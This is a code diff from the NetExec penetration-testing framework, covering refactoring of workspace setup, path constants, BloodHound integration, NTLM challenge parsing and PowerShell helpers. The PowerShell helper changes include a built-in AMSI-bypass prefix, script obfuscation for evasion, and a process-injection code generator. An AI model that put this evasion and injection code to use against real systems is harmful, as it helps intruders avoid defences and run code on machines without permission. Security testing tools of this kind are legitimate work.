config.read(config_path)
|
||||||
|
except Exception as e:
|
||||||
|
print(f"[-] Error reading nxc.conf: {e}")
|
||||||
|
sys.exit(1)
|
||||||
|
return config
|
||||||
|
|
||||||
|
|
||||||
|
def get_workspace(config):
|
||||||
|
return config.get("nxc", "workspace")
|
||||||
|
|
||||||
|
|
||||||
|
def set_workspace(config_path, workspace_name):
|
||||||
|
config = open_config(config_path)
|
||||||
|
config.set("nxc", "workspace", workspace_name)
|
||||||
|
write_configfile(config, config_path)
|
||||||
|
print(f"[*] Workspace set to {workspace_name}")
|
||||||
|
|
||||||
|
|
||||||
|
def get_db(config):
|
||||||
|
return config.get("nxc", "last_used_db")
|
||||||
|
|
||||||
|
|
||||||
|
def write_configfile(config, config_path):
|
||||||
|
with open(config_path, "w") as configfile:
|
||||||
|
config.write(configfile)
|
||||||
|
|
||||||
|
|
||||||
|
def create_workspace(workspace_name, p_loader=None):
|
||||||
|
"""
|
||||||
|
Create a new workspace with the given name.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
----
|
||||||
|
workspace_name (str): The name of the workspace.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
None
|
||||||
|
"""
|
||||||
|
if exists(path_join(WORKSPACE_DIR, workspace_name)):
|
||||||
|
print(f"[-] Workspace {workspace_name} already exists")
|
||||||
|
else:
|
||||||
|
print(f"[*] Creating {workspace_name} workspace")
|
||||||
|
mkdir(path_join(WORKSPACE_DIR, workspace_name))
|
||||||
|
|
||||||
|
if p_loader is None:
|
||||||
|
p_loader = ProtocolLoader()
|
||||||
|
protocols = p_loader.get_protocols()
|
||||||
|
|
||||||
|
for protocol in protocols:
|
||||||
|
protocol_object = p_loader.load_protocol(protocols[protocol]["dbpath"])
|
||||||
|
proto_db_path = path_join(WORKSPACE_DIR, workspace_name, f"{protocol}.db")
|
||||||
|
|
||||||
|
if not exists(proto_db_path):
|
||||||
|
print(f"[*] Initializing {protocol.upper()} protocol database")
|
||||||
|
conn = connect(proto_db_path)
|
||||||
|
c = conn.cursor()
|
||||||
|
|
||||||
|
# try to prevent some weird sqlite I/O errors
|
||||||
|
c.execute("PRAGMA journal_mode = OFF")
|
||||||
|
c.execute("PRAGMA foreign_keys = 1")
|
||||||
|
|
||||||
|
protocol_object.database.db_schema(c)
|
||||||
|
|
||||||
|
# commit the changes and close everything off
|
||||||
|
conn.commit()
|
||||||
|
conn.close()
|
||||||
|
|
||||||
|
|
||||||
|
def delete_workspace(workspace_name):
|
||||||
|
shutil.rmtree(path_join(WORKSPACE_DIR, workspace_name))
|
||||||
|
print(f"[*] Workspace {workspace_name} deleted")
|
||||||
|
|
||||||
|
|
||||||
|
def initialize_db():
|
||||||
|
if not exists(path_join(WORKSPACE_DIR, "default")):
|
||||||
|
create_workspace("default")
|
|
@ -1,12 +1,9 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
from os import mkdir
|
from os import mkdir
|
||||||
from os.path import exists
|
from os.path import exists
|
||||||
from os.path import join as path_join
|
from os.path import join as path_join
|
||||||
import shutil
|
import shutil
|
||||||
from nxc.paths import nxc_PATH, CONFIG_PATH, TMP_PATH, DATA_PATH
|
from nxc.paths import NXC_PATH, CONFIG_PATH, TMP_PATH, DATA_PATH
|
||||||
from nxc.nxcdb import initialize_db
|
from nxc.database import initialize_db
|
||||||
from nxc.logger import nxc_logger
|
from nxc.logger import nxc_logger
|
||||||
|
|
||||||
|
|
||||||
|
@ -14,10 +11,10 @@ def first_run_setup(logger=nxc_logger):
|
||||||
if not exists(TMP_PATH):
|
if not exists(TMP_PATH):
|
||||||
mkdir(TMP_PATH)
|
mkdir(TMP_PATH)
|
||||||
|
|
||||||
if not exists(nxc_PATH):
|
if not exists(NXC_PATH):
|
||||||
logger.display("First time use detected")
|
logger.display("First time use detected")
|
||||||
logger.display("Creating home directory structure")
|
logger.display("Creating home directory structure")
|
||||||
mkdir(nxc_PATH)
|
mkdir(NXC_PATH)
|
||||||
|
|
||||||
folders = (
|
folders = (
|
||||||
"logs",
|
"logs",
|
||||||
|
@ -28,30 +25,17 @@ def first_run_setup(logger=nxc_logger):
|
||||||
"screenshots",
|
"screenshots",
|
||||||
)
|
)
|
||||||
for folder in folders:
|
for folder in folders:
|
||||||
if not exists(path_join(nxc_PATH, folder)):
|
if not exists(path_join(NXC_PATH, folder)):
|
||||||
logger.display(f"Creating missing folder {folder}")
|
logger.display(f"Creating missing folder {folder}")
|
||||||
mkdir(path_join(nxc_PATH, folder))
|
mkdir(path_join(NXC_PATH, folder))
|
||||||
|
|
||||||
initialize_db(logger)
|
initialize_db()
|
||||||
|
|
||||||
if not exists(CONFIG_PATH):
|
if not exists(CONFIG_PATH):
|
||||||
logger.display("Copying default configuration file")
|
logger.display("Copying default configuration file")
|
||||||
default_path = path_join(DATA_PATH, "nxc.conf")
|
default_path = path_join(DATA_PATH, "nxc.conf")
|
||||||
shutil.copy(default_path, nxc_PATH)
|
shutil.copy(default_path, NXC_PATH)
|
||||||
|
|
||||||
# if not exists(CERT_PATH):
|
# if not exists(CERT_PATH):
|
||||||
# logger.display('Generating SSL certificate')
|
|
||||||
# try:
|
|
||||||
# check_output(['openssl', 'help'], stderr=PIPE)
|
|
||||||
# if os.name != 'nt':
|
# if os.name != 'nt':
|
||||||
# os.system('openssl req -new -x509 -keyout {path} -out {path} -days 365 -nodes -subj "/C=US" > /dev/null 2>&1'.format(path=CERT_PATH))
|
|
||||||
# else:
|
|
||||||
# os.system('openssl req -new -x509 -keyout {path} -out {path} -days 365 -nodes -subj "/C=US"'.format(path=CERT_PATH))
|
|
||||||
# except OSError as e:
|
|
||||||
# if e.errno == errno.ENOENT:
|
# if e.errno == errno.ENOENT:
|
||||||
# logger.error('OpenSSL command line utility is not installed, could not generate certificate, using default certificate')
|
|
||||||
# default_path = path_join(DATA_PATH, 'default.pem')
|
|
||||||
# shutil.copy(default_path, CERT_PATH)
|
|
||||||
# else:
|
|
||||||
# logger.error('Error while generating SSL certificate: {}'.format(e))
|
|
||||||
# sys.exit(1)
|
|
||||||
|
|
|
@ -1,9 +1,7 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
import os
|
import os
|
||||||
from nxc.paths import DATA_PATH
|
from nxc.paths import DATA_PATH
|
||||||
|
|
||||||
|
|
||||||
def get_script(path):
|
def get_script(path):
|
||||||
with open(os.path.join(DATA_PATH, path), "r") as script:
|
with open(os.path.join(DATA_PATH, path)) as script:
|
||||||
return script.read()
|
return script.read()
|
||||||
|
|
|
@ -1,18 +1,32 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
|
|
||||||
def add_user_bh(user, domain, logger, config):
|
def add_user_bh(user, domain, logger, config):
|
||||||
|
"""Adds a user to the BloodHound graph database.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
----
|
||||||
|
user (str or list): The username of the user or a list of user dictionaries.
|
||||||
|
domain (str): The domain of the user.
|
||||||
|
logger (Logger): The logger object for logging messages.
|
||||||
|
config (ConfigParser): The configuration object for accessing BloodHound settings.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
None
|
||||||
|
|
||||||
|
Raises:
|
||||||
|
------
|
||||||
|
AuthError: If the provided Neo4J credentials are not valid.
|
||||||
|
ServiceUnavailable: If Neo4J is not available on the specified URI.
|
||||||
|
Exception: If an unexpected error occurs with Neo4J.
|
||||||
|
"""
|
||||||
users_owned = []
|
users_owned = []
|
||||||
if isinstance(user, str):
|
if isinstance(user, str):
|
||||||
users_owned.append({"username": user.upper(), "domain": domain.upper()})
|
users_owned.append({"username": user.upper(), "domain": domain.upper()})
|
||||||
else:
|
else:
|
||||||
users_owned = user
|
users_owned = user
|
||||||
|
|
||||||
if config.get("BloodHound", "bh_enabled") != "False":
|
if config.get("BloodHound", "bh_enabled") != "False":
|
||||||
try:
|
# we do a conditional import here to avoid loading these if BH isn't enabled
|
||||||
from neo4j.v1 import GraphDatabase
|
from neo4j import GraphDatabase
|
||||||
except:
|
|
||||||
from neo4j import GraphDatabase
|
|
||||||
from neo4j.exceptions import AuthError, ServiceUnavailable
|
from neo4j.exceptions import AuthError, ServiceUnavailable
|
||||||
|
|
||||||
uri = f"bolt://{config.get('BloodHound', 'bh_uri')}:{config.get('BloodHound', 'bh_port')}"
|
uri = f"bolt://{config.get('BloodHound', 'bh_uri')}:{config.get('BloodHound', 'bh_port')}"
|
||||||
|
@ -26,30 +40,64 @@ def add_user_bh(user, domain, logger, config):
|
||||||
encrypted=False,
|
encrypted=False,
|
||||||
)
|
)
|
||||||
try:
|
try:
|
||||||
with driver.session() as session:
|
with driver.session().begin_transaction() as tx:
|
||||||
with session.begin_transaction() as tx:
|
for user_info in users_owned:
|
||||||
for info in users_owned:
|
distinguished_name = "".join([f"DC={dc}," for dc in user_info["domain"].split(".")]).rstrip(",")
|
||||||
if info["username"][-1] == "$":
|
domain_query = tx.run(f"MATCH (d:Domain) WHERE d.distinguishedname STARTS WITH '{distinguished_name}' RETURN d").data()
|
||||||
user_owned = info["username"][:-1] + "." + info["domain"]
|
if not domain_query:
|
||||||
account_type = "Computer"
|
logger.debug(f"Domain {user_info['domain']} not found in BloodHound. Falling back to domainless query.")
|
||||||
else:
|
_add_without_domain(user_info, tx, logger)
|
||||||
user_owned = info["username"] + "@" + info["domain"]
|
else:
|
||||||
account_type = "User"
|
domain = domain_query[0]["d"].get("name")
|
||||||
|
_add_with_domain(user_info, domain, tx, logger)
|
||||||
result = tx.run(f'MATCH (c:{account_type} {{name:"{user_owned}"}}) RETURN c')
|
except AuthError:
|
||||||
|
|
||||||
if result.data()[0]["c"].get("owned") in (False, None):
|
|
||||||
logger.debug(f'MATCH (c:{account_type} {{name:"{user_owned}"}}) SET c.owned=True RETURN c.name AS name')
|
|
||||||
result = tx.run(f'MATCH (c:{account_type} {{name:"{user_owned}"}}) SET c.owned=True RETURN c.name AS name')
|
|
||||||
logger.highlight(f"Node {user_owned} successfully set as owned in BloodHound")
|
|
||||||
except AuthError as e:
|
|
||||||
logger.fail(f"Provided Neo4J credentials ({config.get('BloodHound', 'bh_user')}:{config.get('BloodHound', 'bh_pass')}) are not valid.")
|
logger.fail(f"Provided Neo4J credentials ({config.get('BloodHound', 'bh_user')}:{config.get('BloodHound', 'bh_pass')}) are not valid.")
|
||||||
return
|
return
|
||||||
except ServiceUnavailable as e:
|
except ServiceUnavailable:
|
||||||
logger.fail(f"Neo4J does not seem to be available on {uri}.")
|
logger.fail(f"Neo4J does not seem to be available on {uri}.")
|
||||||
return
|
return
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
logger.fail("Unexpected error with Neo4J")
|
logger.fail(f"Unexpected error with Neo4J: {e}")
|
||||||
logger.fail("Account not found on the domain")
|
|
||||||
return
|
return
|
||||||
driver.close()
|
driver.close()
|
||||||
|
|
||||||
|
|
||||||
|
def _add_with_domain(user_info, domain, tx, logger):
|
||||||
|
if user_info["username"][-1] == "$":
|
||||||
|
user_owned = f"{user_info['username'][:-1]}.{domain}"
|
||||||
|
account_type = "Computer"
|
||||||
|
else:
|
||||||
|
user_owned = f"{user_info['username']}@{domain}"
|
||||||
|
account_type = "User"
|
||||||
|
|
||||||
|
result = tx.run(f"MATCH (c:{account_type} {{name:'{user_owned}'}}) RETURN c").data()
|
||||||
|
|
||||||
|
if len(result) == 0:
|
||||||
|
logger.fail("Account not found in the BloodHound database.")
|
||||||
|
return
|
||||||
|
if result[0]["c"].get("owned") in (False, None):
|
||||||
|
logger.debug(f"MATCH (c:{account_type} {{name:'{user_owned}'}}) SET c.owned=True RETURN c.name AS name")
|
||||||
|
result = tx.run(f"MATCH (c:{account_type} {{name:'{user_owned}'}}) SET c.owned=True RETURN c.name AS name").data()[0]
|
||||||
|
logger.highlight(f"Node {result['name']} successfully set as owned in BloodHound")
|
||||||
|
|
||||||
|
|
||||||
|
def _add_without_domain(user_info, tx, logger):
|
||||||
|
if user_info["username"][-1] == "$":
|
||||||
|
user_owned = user_info["username"][:-1]
|
||||||
|
account_type = "Computer"
|
||||||
|
else:
|
||||||
|
user_owned = user_info["username"]
|
||||||
|
account_type = "User"
|
||||||
|
|
||||||
|
result = tx.run(f"MATCH (c:{account_type}) WHERE c.name STARTS WITH '{user_owned}' RETURN c").data()
|
||||||
|
|
||||||
|
if len(result) == 0:
|
||||||
|
logger.fail("Account not found in the BloodHound database.")
|
||||||
|
return
|
||||||
|
elif len(result) >= 2:
|
||||||
|
logger.fail(f"Multiple accounts found with the name '{user_info['username']}' in the BloodHound database. Please specify the FQDN ex:domain.local")
|
||||||
|
return
|
||||||
|
elif result[0]["c"].get("owned") in (False, None):
|
||||||
|
logger.debug(f"MATCH (c:{account_type} {{name:'{result[0]['c']['name']}'}}) SET c.owned=True RETURN c.name AS name")
|
||||||
|
result = tx.run(f"MATCH (c:{account_type} {{name:'{result[0]['c']['name']}'}}) SET c.owned=True RETURN c.name AS name").data()[0]
|
||||||
|
logger.highlight(f"Node {result['name']} successfully set as owned in BloodHound")
|
||||||
|
|
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
import random
|
import random
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
import os
|
import os
|
||||||
from termcolor import colored
|
from termcolor import colored
|
||||||
|
|
||||||
|
|
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
import random
|
import random
|
||||||
import string
|
import string
|
||||||
import re
|
import re
|
||||||
|
@ -9,7 +6,7 @@ import os
|
||||||
|
|
||||||
|
|
||||||
def identify_target_file(target_file):
|
def identify_target_file(target_file):
|
||||||
with open(target_file, "r") as target_file_handle:
|
with open(target_file) as target_file_handle:
|
||||||
for i, line in enumerate(target_file_handle):
|
for i, line in enumerate(target_file_handle):
|
||||||
if i == 1:
|
if i == 1:
|
||||||
if line.startswith("<NessusClientData"):
|
if line.startswith("<NessusClientData"):
|
||||||
|
@ -26,10 +23,7 @@ def gen_random_string(length=10):
|
||||||
|
|
||||||
def validate_ntlm(data):
|
def validate_ntlm(data):
|
||||||
allowed = re.compile("^[0-9a-f]{32}", re.IGNORECASE)
|
allowed = re.compile("^[0-9a-f]{32}", re.IGNORECASE)
|
||||||
if allowed.match(data):
|
return bool(allowed.match(data))
|
||||||
return True
|
|
||||||
else:
|
|
||||||
return False
|
|
||||||
|
|
||||||
|
|
||||||
def called_from_cmd_args():
|
def called_from_cmd_args():
|
||||||
|
@ -45,12 +39,10 @@ def called_from_cmd_args():
|
||||||
|
|
||||||
# Stolen from https://github.com/pydanny/whichcraft/
|
# Stolen from https://github.com/pydanny/whichcraft/
|
||||||
def which(cmd, mode=os.F_OK | os.X_OK, path=None):
|
def which(cmd, mode=os.F_OK | os.X_OK, path=None):
|
||||||
"""Given a command, mode, and a PATH string, return the path which
|
"""Find the path which conforms to the given mode on the PATH for a command.
|
||||||
conforms to the given mode on the PATH, or None if there is no such
|
|
||||||
file.
|
Given a command, mode, and a PATH string, return the path which conforms to the given mode on the PATH, or None if there is no such file.
|
||||||
`mode` defaults to os.F_OK | os.X_OK. `path` defaults to the result
|
`mode` defaults to os.F_OK | os.X_OK. `path` defaults to the result of os.environ.get("PATH"), or can be overridden with a custom search path.
|
||||||
of os.environ.get("PATH"), or can be overridden with a custom search
|
|
||||||
path.
|
|
||||||
Note: This function was backported from the Python 3 source code.
|
Note: This function was backported from the Python 3 source code.
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -77,12 +69,11 @@ def which(cmd, mode=os.F_OK | os.X_OK, path=None):
|
||||||
files = [cmd]
|
files = [cmd]
|
||||||
|
|
||||||
seen = set()
|
seen = set()
|
||||||
for dir in path:
|
for p in path:
|
||||||
normdir = os.path.normcase(dir)
|
normdir = os.path.normcase(p)
|
||||||
if normdir not in seen:
|
if normdir not in seen:
|
||||||
seen.add(normdir)
|
seen.add(normdir)
|
||||||
for thefile in files:
|
for thefile in files:
|
||||||
name = os.path.join(dir, thefile)
|
name = os.path.join(p, thefile)
|
||||||
if _access_check(name, mode):
|
if _access_check(name, mode):
|
||||||
return name
|
return name
|
||||||
return None
|
|
||||||
|
|
|
@ -12,7 +12,8 @@ Authors:
|
||||||
Guillaume DAUMAS (@BlWasp_)
|
Guillaume DAUMAS (@BlWasp_)
|
||||||
Lucien DOUSTALY (@Wlayzz)
|
Lucien DOUSTALY (@Wlayzz)
|
||||||
|
|
||||||
References:
|
References
|
||||||
|
----------
|
||||||
MS-ADA1, MS-ADA2, MS-ADA3 Active Directory Schema Attributes and their GUID:
|
MS-ADA1, MS-ADA2, MS-ADA3 Active Directory Schema Attributes and their GUID:
|
||||||
- [MS-ADA1] https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-ada1/19528560-f41e-4623-a406-dabcfff0660f
|
- [MS-ADA1] https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-ada1/19528560-f41e-4623-a406-dabcfff0660f
|
||||||
- [MS-ADA2] https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-ada2/e20ebc4e-5285-40ba-b3bd-ffcb81c2783e
|
- [MS-ADA2] https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-ada2/e20ebc4e-5285-40ba-b3bd-ffcb81c2783e
|
||||||
|
@ -22,6 +23,7 @@ References:
|
||||||
|
|
||||||
|
|
||||||
This library is, for the moment, not present in the Impacket version used by NetExec, so I add it manually in helpers.
|
This library is, for the moment, not present in the Impacket version used by NetExec, so I add it manually in helpers.
|
||||||
|
|
||||||
"""
|
"""
|
||||||
|
|
||||||
SCHEMA_OBJECTS = {
|
SCHEMA_OBJECTS = {
|
||||||
|
|
|
@ -0,0 +1,34 @@
|
||||||
|
# Original from here: https://github.com/fortra/impacket/blob/master/examples/DumpNTLMInfo.py#L568
|
||||||
|
|
||||||
|
import struct
|
||||||
|
|
||||||
|
from impacket import ntlm
|
||||||
|
from impacket.smb3 import WIN_VERSIONS
|
||||||
|
import contextlib
|
||||||
|
|
||||||
|
|
||||||
|
def parse_challenge(challange):
|
||||||
|
target_info = {
|
||||||
|
"hostname": None,
|
||||||
|
"domain": None,
|
||||||
|
"os_version": None
|
||||||
|
}
|
||||||
|
challange = ntlm.NTLMAuthChallenge(challange)
|
||||||
|
av_pairs = ntlm.AV_PAIRS(challange["TargetInfoFields"][:challange["TargetInfoFields_len"]])
|
||||||
|
if av_pairs[ntlm.NTLMSSP_AV_HOSTNAME] is not None:
|
||||||
|
with contextlib.suppress(Exception):
|
||||||
|
target_info["hostname"] = av_pairs[ntlm.NTLMSSP_AV_HOSTNAME][1].decode("utf-16le")
|
||||||
|
if av_pairs[ntlm.NTLMSSP_AV_DNS_DOMAINNAME] is not None:
|
||||||
|
with contextlib.suppress(Exception):
|
||||||
|
target_info["domain"] = av_pairs[ntlm.NTLMSSP_AV_DNS_DOMAINNAME][1].decode("utf-16le")
|
||||||
|
if "Version" in challange.fields:
|
||||||
|
version = challange["Version"]
|
||||||
|
if len(version) >= 4:
|
||||||
|
major_version = version[0]
|
||||||
|
minor_version = version[1]
|
||||||
|
product_build = struct.unpack("<H", version[2:4])[0]
|
||||||
|
if product_build in WIN_VERSIONS:
|
||||||
|
target_info["os_version"] = f"{WIN_VERSIONS[product_build]} Build {product_build}"
|
||||||
|
else:
|
||||||
|
target_info["os_version"] = f"{major_version}.{minor_version} Build {product_build}"
|
||||||
|
return target_info
|
|
@ -1,5 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
import os
|
import os
|
||||||
import re
|
import re
|
||||||
from sys import exit
|
from sys import exit
|
||||||
|
@ -8,35 +6,80 @@ from random import choice, sample
|
||||||
from subprocess import call
|
from subprocess import call
|
||||||
from nxc.helpers.misc import which
|
from nxc.helpers.misc import which
|
||||||
from nxc.logger import nxc_logger
|
from nxc.logger import nxc_logger
|
||||||
from nxc.paths import nxc_PATH, DATA_PATH
|
from nxc.paths import NXC_PATH, DATA_PATH
|
||||||
from base64 import b64encode
|
from base64 import b64encode
|
||||||
|
import random
|
||||||
|
|
||||||
obfuscate_ps_scripts = False
|
obfuscate_ps_scripts = False
|
||||||
|
|
||||||
|
|
||||||
def get_ps_script(path):
|
def get_ps_script(path):
|
||||||
|
"""Generates a full path to a PowerShell script given a relative path.
|
||||||
|
|
||||||
|
Parameters
|
||||||
|
----------
|
||||||
|
path (str): The relative path to the PowerShell script.
|
||||||
|
|
||||||
|
Returns
|
||||||
|
-------
|
||||||
|
str: The full path to the PowerShell script.
|
||||||
|
"""
|
||||||
return os.path.join(DATA_PATH, path)
|
return os.path.join(DATA_PATH, path)
|
||||||
|
|
||||||
|
|
||||||
def encode_ps_command(command):
|
def encode_ps_command(command):
|
||||||
|
"""
|
||||||
|
Encodes a PowerShell command into a base64-encoded string.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
----
|
||||||
|
command (str): The PowerShell command to encode.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
str: The base64-encoded string representation of the encoded command.
|
||||||
|
"""
|
||||||
return b64encode(command.encode("UTF-16LE")).decode()
|
return b64encode(command.encode("UTF-16LE")).decode()
|
||||||
|
|
||||||
|
|
||||||
def is_powershell_installed():
|
def is_powershell_installed():
|
||||||
|
"""
|
||||||
|
Check if PowerShell is installed.
|
||||||
|
|
||||||
|
Returns
|
||||||
|
-------
|
||||||
|
bool: True if PowerShell is installed, False otherwise.
|
||||||
|
"""
|
||||||
if which("powershell"):
|
if which("powershell"):
|
||||||
return True
|
return True
|
||||||
return False
|
return False
|
||||||
|
|
||||||
|
|
||||||
def obfs_ps_script(path_to_script):
|
def obfs_ps_script(path_to_script):
|
||||||
|
"""
|
||||||
|
Obfuscates a PowerShell script.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
----
|
||||||
|
path_to_script (str): The path to the PowerShell script.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
str: The obfuscated PowerShell script.
|
||||||
|
|
||||||
|
Raises:
|
||||||
|
------
|
||||||
|
FileNotFoundError: If the script file does not exist.
|
||||||
|
OSError: If there is an error during obfuscation.
|
||||||
|
"""
|
||||||
ps_script = path_to_script.split("/")[-1]
|
ps_script = path_to_script.split("/")[-1]
|
||||||
obfs_script_dir = os.path.join(nxc_PATH, "obfuscated_scripts")
|
obfs_script_dir = os.path.join(NXC_PATH, "obfuscated_scripts")
|
||||||
obfs_ps_script = os.path.join(obfs_script_dir, ps_script)
|
obfs_ps_script = os.path.join(obfs_script_dir, ps_script)
|
||||||
|
|
||||||
if is_powershell_installed() and obfuscate_ps_scripts:
|
if is_powershell_installed() and obfuscate_ps_scripts:
|
||||||
if os.path.exists(obfs_ps_script):
|
if os.path.exists(obfs_ps_script):
|
||||||
nxc_logger.display("Using cached obfuscated Powershell script")
|
nxc_logger.display("Using cached obfuscated Powershell script")
|
||||||
with open(obfs_ps_script, "r") as script:
|
with open(obfs_ps_script) as script:
|
||||||
return script.read()
|
return script.read()
|
||||||
|
|
||||||
nxc_logger.display("Performing one-time script obfuscation, go look at some memes cause this can take a bit...")
|
nxc_logger.display("Performing one-time script obfuscation, go look at some memes cause this can take a bit...")
|
||||||
|
@ -45,15 +88,15 @@ def obfs_ps_script(path_to_script):
|
||||||
nxc_logger.debug(invoke_obfs_command)
|
nxc_logger.debug(invoke_obfs_command)
|
||||||
|
|
||||||
with open(os.devnull, "w") as devnull:
|
with open(os.devnull, "w") as devnull:
|
||||||
return_code = call(invoke_obfs_command, stdout=devnull, stderr=devnull, shell=True)
|
call(invoke_obfs_command, stdout=devnull, stderr=devnull, shell=True)
|
||||||
|
|
||||||
nxc_logger.success("Script obfuscated successfully")
|
nxc_logger.success("Script obfuscated successfully")
|
||||||
|
|
||||||
with open(obfs_ps_script, "r") as script:
|
with open(obfs_ps_script) as script:
|
||||||
return script.read()
|
return script.read()
|
||||||
|
|
||||||
else:
|
else:
|
||||||
with open(get_ps_script(path_to_script), "r") as script:
|
with open(get_ps_script(path_to_script)) as script:
|
||||||
"""
|
"""
|
||||||
Strip block comments, line comments, empty lines, verbose statements,
|
Strip block comments, line comments, empty lines, verbose statements,
|
||||||
and debug statements from a PowerShell source file.
|
and debug statements from a PowerShell source file.
|
||||||
|
@ -61,17 +104,31 @@ def obfs_ps_script(path_to_script):
|
||||||
# strip block comments
|
# strip block comments
|
||||||
stripped_code = re.sub(re.compile("<#.*?#>", re.DOTALL), "", script.read())
|
stripped_code = re.sub(re.compile("<#.*?#>", re.DOTALL), "", script.read())
|
||||||
# strip blank lines, lines starting with #, and verbose/debug statements
|
# strip blank lines, lines starting with #, and verbose/debug statements
|
||||||
stripped_code = "\n".join([line for line in stripped_code.split("\n") if ((line.strip() != "") and (not line.strip().startswith("#")) and (not line.strip().lower().startswith("write-verbose ")) and (not line.strip().lower().startswith("write-debug ")))])
|
return "\n".join([line for line in stripped_code.split("\n") if ((line.strip() != "") and (not line.strip().startswith("#")) and (not line.strip().lower().startswith("write-verbose ")) and (not line.strip().lower().startswith("write-debug ")))])
|
||||||
|
|
||||||
return stripped_code
|
|
||||||
|
|
||||||
|
|
||||||
def create_ps_command(ps_command, force_ps32=False, dont_obfs=False, custom_amsi=None):
|
def create_ps_command(ps_command, force_ps32=False, dont_obfs=False, custom_amsi=None):
|
||||||
|
"""
|
||||||
|
Generates a PowerShell command based on the provided `ps_command` parameter.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
----
|
||||||
|
ps_command (str): The PowerShell command to be executed.
|
||||||
|
|
||||||
|
force_ps32 (bool, optional): Whether to force PowerShell to run in 32-bit mode. Defaults to False.
|
||||||
|
|
||||||
|
dont_obfs (bool, optional): Whether to obfuscate the generated command. Defaults to False.
|
||||||
|
|
||||||
|
custom_amsi (str, optional): Path to a custom AMSI bypass script. Defaults to None.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
str: The generated PowerShell command.
|
||||||
|
"""
|
||||||
if custom_amsi:
|
if custom_amsi:
|
||||||
with open(custom_amsi) as file_in:
|
with open(custom_amsi) as file_in:
|
||||||
lines = []
|
lines = list(file_in)
|
||||||
for line in file_in:
|
|
||||||
lines.append(line)
|
|
||||||
amsi_bypass = "".join(lines)
|
amsi_bypass = "".join(lines)
|
||||||
else:
|
else:
|
||||||
amsi_bypass = """[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
|
amsi_bypass = """[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
|
||||||
|
@ -80,35 +137,9 @@ try{
|
||||||
}catch{}
|
}catch{}
|
||||||
"""
|
"""
|
||||||
|
|
||||||
if force_ps32:
|
command = amsi_bypass + f"\n$functions = {{\n function Command-ToExecute\n {{\n{amsi_bypass + ps_command}\n }}\n}}\nif ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64')\n{{\n $job = Start-Job -InitializationScript $functions -ScriptBlock {{Command-ToExecute}} -RunAs32\n $job | Wait-Job\n}}\nelse\n{{\n IEX \"$functions\"\n Command-ToExecute\n}}\n" if force_ps32 else amsi_bypass + ps_command
|
||||||
command = (
|
|
||||||
amsi_bypass
|
|
||||||
+ """
|
|
||||||
$functions = {{
|
|
||||||
function Command-ToExecute
|
|
||||||
{{
|
|
||||||
{command}
|
|
||||||
}}
|
|
||||||
}}
|
|
||||||
if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64')
|
|
||||||
{{
|
|
||||||
$job = Start-Job -InitializationScript $functions -ScriptBlock {{Command-ToExecute}} -RunAs32
|
|
||||||
$job | Wait-Job
|
|
||||||
}}
|
|
||||||
else
|
|
||||||
{{
|
|
||||||
IEX "$functions"
|
|
||||||
Command-ToExecute
|
|
||||||
}}
|
|
||||||
""".format(
|
|
||||||
command=amsi_bypass + ps_command
|
|
||||||
)
|
|
||||||
)
|
|
||||||
|
|
||||||
else:
|
nxc_logger.debug(f"Generated PS command:\n {command}\n")
|
||||||
command = amsi_bypass + ps_command
|
|
||||||
|
|
||||||
nxc_logger.debug("Generated PS command:\n {}\n".format(command))
|
|
||||||
|
|
||||||
# We could obfuscate the initial launcher using Invoke-Obfuscation but because this function gets executed
|
# We could obfuscate the initial launcher using Invoke-Obfuscation but because this function gets executed
|
||||||
# concurrently it would spawn a local powershell process per host which isn't ideal, until I figure out a good way
|
# concurrently it would spawn a local powershell process per host which isn't ideal, until I figure out a good way
|
||||||
|
@ -166,6 +197,20 @@ else
|
||||||
|
|
||||||
|
|
||||||
def gen_ps_inject(command, context=None, procname="explorer.exe", inject_once=False):
|
def gen_ps_inject(command, context=None, procname="explorer.exe", inject_once=False):
|
||||||
|
"""
|
||||||
|
Generates a PowerShell code block for injecting a command into a specified process.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
----
|
||||||
|
command (str): The command to be injected.
|
||||||
|
context (str, optional): The context in which the code block will be injected. Defaults to None.
|
||||||
|
procname (str, optional): The name of the process into which the command will be injected. Defaults to "explorer.exe".
|
||||||
|
inject_once (bool, optional): Specifies whether the command should be injected only once. Defaults to False.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
str: The generated PowerShell code block.
|
||||||
|
"""
|
||||||
# The following code gives us some control over where and how Invoke-PSInject does its thang
|
# The following code gives us some control over where and how Invoke-PSInject does its thang
|
||||||
